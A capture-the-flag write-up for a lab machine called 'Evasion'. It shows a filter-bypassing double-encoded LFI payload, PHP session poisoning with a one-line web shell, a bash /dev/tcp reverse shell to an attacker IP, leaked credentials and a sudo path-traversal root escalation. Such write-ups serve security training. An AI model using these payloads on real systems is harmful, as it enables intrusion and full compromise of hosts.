Evasion Writeup

Port Scanning

nmap -sV -sC -p- -v $IP --min-rate 3000

Only ports 22 (SSH) and 80 (HTTP) are open.

Enumeration

When accessing the address on port 80, it redirects us to evasion.hc

We need to add the domain to our local DNS /etc/hosts

sudo vim /etc/hosts

Accessing the application on port 80, it was possible to register a new user to access the application.

By intercepting the route for Software Guide > Download, it was possible to find an LFI (Local File Inclusion) in the guide parameter. The application has a filter against LFI, but it was bypassed using double URL encoding.

%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%2565%2574%2563%252f%2570%2561%2573%2573%2577%2564

With our session cookie, we can read the file /var/lib/php/sessions/sess_0n9720fs19remri8e0h26gb5bq, which we can use to poison the PHP session log.

To poison the logs, we’ll create a new user but pass a PHP web shell in the login field.

<?php system($_GET[0]); ?>

When logging in with the created user (webshell) and intercepting the same request, we can successfully use the poisoning.

../../../../../var/lib/php/sessions/sess_p3eqpujc8mqhqnu9agu96bh8om

Foot Hold

Through LFI, we were able to get RCE by poisoning the logs, and with that, we can get a reverse shell using the following payload:

bash -c 'exec bash -i &>/dev/tcp/10.0.31.150/1337 <&1'

nc -lnvp 1337

Privillege Escalation

By running Pspy64 on the server, we identified a running process that reveals the credentials for user lucas.

lucas:TL7g81rqYFW

sudo -l

Since we can run any script as root without a password, we just need to create a Python script that gives us root access to the machine.

echo "import os" > evil.py
echo "os.system('/bin/bash')" >> evil.py
sudo /usr/bin/python3 /opt/scripts/../../../tmp/evil.py

Proof